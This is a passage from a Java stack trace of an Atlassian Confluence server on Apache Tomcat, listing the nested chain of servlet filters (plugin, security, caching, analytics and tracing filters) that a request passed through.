com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.applinks.core.rest.context.ContextFilter.doFilter(ContextFilter.java:24) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.applinks.core.rest.context.ContextFilter.doFilter(ContextFilter.java:24) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.applinks.core.rest.context.ContextFilter.doFilter(ContextFilter.java:24) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.applinks.core.rest.context.ContextFilter.doFilter(ContextFilter.java:24) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.applinks.core.rest.context.ContextFilter.doFilter(ContextFilter.java:24) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.plugins.pulp.PulpFilter.doFilter(PulpFilter.java:70) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.analytics.client.filter.UniversalAnalyticsFilter.doFilter(UniversalAnalyticsFilter.java:75) at com.atlassian.analytics.client.filter.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:48) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.mywork.client.filter.ServingRequestsFilter.doFilter(ServingRequestsFilter.java:32) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.efi.OnboardingFilter.doFilter(OnboardingFilter.java:77) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.prettyurls.filter.PrettyUrlsSiteMeshFixupFilter.doFilter(PrettyUrlsSiteMeshFixupFilter.java:32) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.prettyurls.filter.PrettyUrlsDispatcherFilter.doFilter(PrettyUrlsDispatcherFilter.java:55) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.prettyurls.filter.PrettyUrlsSiteMeshFilter.doFilter(PrettyUrlsSiteMeshFilter.java:80) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.prettyurls.filter.PrettyUrlsMatcherFilter.doFilter(PrettyUrlsMatcherFilter.java:51) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.plugins.mobile.filter.MobileAppWebViewFilter.doFilter(MobileAppWebViewFilter.java:58) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:55) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:43) at com.atlassian.johnson.plugin.servlet.filter.JohnsonServletFilterModuleContainerFilter.doFilter(JohnsonServletFilterModuleContainerFilter.java:50) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.message.MessagesDecoratorFilter.doFilter(MessagesDecoratorFilter.java:65) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.opensymphony.sitemesh.webapp.SiteMeshFilter.obtainContent(SiteMeshFilter.java:129) at com.opensymphony.sitemesh.webapp.SiteMeshFilter.doFilter(SiteMeshFilter.java:77) at com.atlassian.confluence.util.profiling.ProfilingSiteMeshFilter.doFilter(ProfilingSiteMeshFilter.java:50) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:39) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.troubleshooting.thready.filter.AbstractThreadNamingFilter.doFilter(AbstractThreadNamingFilter.java:46) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.util.profiling.ConfluenceActivityFilter.doFilter(ConfluenceActivityFilter.java:39) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.prettyurls.filter.PrettyUrlsCombinedMatchDispatcherFilter.doFilter(PrettyUrlsCombinedMatchDispatcherFilter.java:56) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:55) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:43) at com.atlassian.johnson.plugin.servlet.filter.JohnsonServletFilterModuleContainerFilter.doFilter(JohnsonServletFilterModuleContainerFilter.java:50) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.jmx.JmxFilter.doFilter(JmxFilter.java:97) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.cache.TransactionalCacheFactoryCleanupFilter.doFilter(TransactionalCacheFactoryCleanupFilter.java:22) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.core.filters.ServletContextThreadLocalFilter.doFilter(ServletContextThreadLocalFilter.java:17) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.UserLoggingContextFilter.doFilter(UserLoggingContextFilter.java:32) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.UserNameHeaderFilter.doFilter(UserNameHeaderFilter.java:25) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.MauEventFilter.doFilterInternal(MauEventFilter.java:31) at com.atlassian.confluence.web.filter.AbstractStaticResourceAwareFilter.doFilter(AbstractStaticResourceAwareFilter.java:43) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.UserThreadLocalFilter.doFilter(UserThreadLocalFilter.java:38) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.ConfluenceTimeoutFilter.doFilter(ConfluenceTimeoutFilter.java:57) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.HttpSessionRegistrarFilter.doFilter(HttpSessionRegistrarFilter.java:74) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.seraph.filter.SecurityFilter.doFilter(SecurityFilter.java:242) at com.atlassian.confluence.web.filter.ConfluenceSecurityFilter.applyFilter(ConfluenceSecurityFilter.java:40) at com.atlassian.confluence.web.filter.ConfluenceSecurityFilter.doFilter(ConfluenceSecurityFilter.java:29) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.ThreadLocalCacheFilter.doFilter(ThreadLocalCacheFilter.java:25) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.security.auth.trustedapps.filter.TrustedApplicationsFilter.doFilter(TrustedApplicationsFilter.java:94) at com.atlassian.confluence.util.AbstractBootstrapHotSwappingFilter.doFilter(AbstractBootstrapHotSwappingFilter.java:35) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.seraph.filter.BaseLoginFilter.doFilter(BaseLoginFilter.java:148) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:39) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.oauth.serviceprovider.internal.servlet.OAuthFilter.doFilter(OAuthFilter.java:67) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.pats.web.filter.TokenBasedAuthenticationFilter.doFilter(TokenBasedAuthenticationFilter.java:83) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.prettyurls.filter.PrettyUrlsCombinedMatchDispatcherFilter.doFilter(PrettyUrlsCombinedMatchDispatcherFilter.java:56) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:55) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:43) at com.atlassian.johnson.plugin.servlet.filter.JohnsonServletFilterModuleContainerFilter.doFilter(JohnsonServletFilterModuleContainerFilter.java:50) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.ClusterHeaderFilter.doFilter(ClusterHeaderFilter.java:57) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at org.springframework.orm.hibernate.support.OpenSessionInViewFilter.doFilterInternal(OpenSessionInViewFilter.java:170) at com.atlassian.confluence.web.filter.ConfluenceOpenSessionInViewFilter.doFilterInternal(ConfluenceOpenSessionInViewFilter.java:41) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.ConfluenceErrorFilter.doFilter(ConfluenceErrorFilter.java:24) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.util.profiling.filters.ProfilingFilter.doFilter(ProfilingFilter.java:105) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.core.datetime.RequestTimeThreadLocalFilter.doFilter(RequestTimeThreadLocalFilter.java:37) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.core.filters.cache.AbstractCachingFilter.doFilter(AbstractCachingFilter.java:31) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:39) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.analytics.client.filter.DefaultAnalyticsFilter.doFilter(DefaultAnalyticsFilter.java:26) at com.atlassian.analytics.client.filter.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:48) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.jwt.internal.servlet.JwtAuthFilter.doFilter(JwtAuthFilter.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.troubleshooting.thready.filter.AbstractThreadNamingFilter.doFilter(AbstractThreadNamingFilter.java:46) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.web.filter.HttpRequestStatsFilter.doFilter(HttpRequestStatsFilter.java:58) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.gzipfilter.GzipFilter.doFilterInternal(GzipFilter.java:121) at com.atlassian.gzipfilter.GzipFilter.doFilter(GzipFilter.java:92) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.web.filter.ConfluenceTimingFilter.doFilter(ConfluenceTimingFilter.java:47) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.prettyurls.filter.PrettyUrlsCombinedMatchDispatcherFilter.doFilter(PrettyUrlsCombinedMatchDispatcherFilter.java:56) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.extra.webdav.servlet.filter.WebdavRequestForwardFilter.doFilter(WebdavRequestForwardFilter.java:72) at com.atlassian.confluence.extra.webdav.servlet.filter.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:29) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:55) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:43) at com.atlassian.johnson.plugin.servlet.filter.JohnsonServletFilterModuleContainerFilter.doFilter(JohnsonServletFilterModuleContainerFilter.java:50) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.MobileAppRequestFilter.doFilter(MobileAppRequestFilter.java:36) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.internal.web.filter.spring.IgnoreWebAsyncManagerFilter.doFilter(IgnoreWebAsyncManagerFilter.java:59) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.validateparam.RequestParamValidationFilter.doFilter(RequestParamValidationFilter.java:51) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.TranslationModeFilter.doFilter(TranslationModeFilter.java:39) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.plugin.servlet.filter.ActionContextCleanUp.doFilter(ActionContextCleanUp.java:71) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.LanguageExtractionFilter.doFilter(LanguageExtractionFilter.java:39) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.impl.vcache.VCacheRequestContextFilter.lambda$doFilter$3(VCacheRequestContextFilter.java:44) at com.atlassian.confluence.impl.vcache.VCacheRequestContextManager.doInRequestContextInternal(VCacheRequestContextManager.java:84) at com.atlassian.confluence.impl.vcache.VCacheRequestContextManager.doInRequestContext(VCacheRequestContextManager.java:68) at com.atlassian.confluence.impl.vcache.VCacheRequestContextFilter.doFilter(VCacheRequestContextFilter.java:43) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.LoggingContextFilter.doFilter(LoggingContextFilter.java:33) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.RequestCacheThreadLocalFilter.doFilter(RequestCacheThreadLocalFilter.java:67) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.github.kristofa.brave.servlet.BraveServletFilter.doFilter(BraveServletFilter.java:59) at com.atlassian.confluence.web.filter.ZipkinTracingFilter.doFilter(ZipkinTracingFilter.java:52) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.ResponseOutputStreamFilter.doFilter(ResponseOutputStreamFilter.java:25) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.johnson.filters.AbstractJohnsonFilter.doFilter(AbstractJohnsonFilter.java:59) at com.atlassian.confluence.web.ConfluenceJohnsonFilter.doFilter(ConfluenceJohnsonFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.setup.ConfluenceEncodingFilter.doFilterInternal(ConfluenceEncodingFilter.java:35) at com.atlassian.confluence.web.filter.AbstractStaticResourceAwareFilter.doFilter(AbstractStaticResourceAwareFilter.java:43) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.core.filters.HeaderSanitisingFilter.doFilter(HeaderSanitisingFilter.java:37) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.servlet.FourOhFourErrorLoggingFilter.doFilter(FourOhFourErrorLoggingFilter.java:64) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.internal.diagnostics.HttpRequestMonitoringFilter.doFilter(HttpRequestMonitoringFilter.java:42) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.DebugFilter.doFilter(DebugFilter.java:46) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:202) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97) at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:542) at org.apache.catalina.valves.StuckThreadDetectionValve.invoke(StuckThreadDetectionValve.java:206) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:143) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:357) at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:374) at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65) at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893) at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1707) at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) at 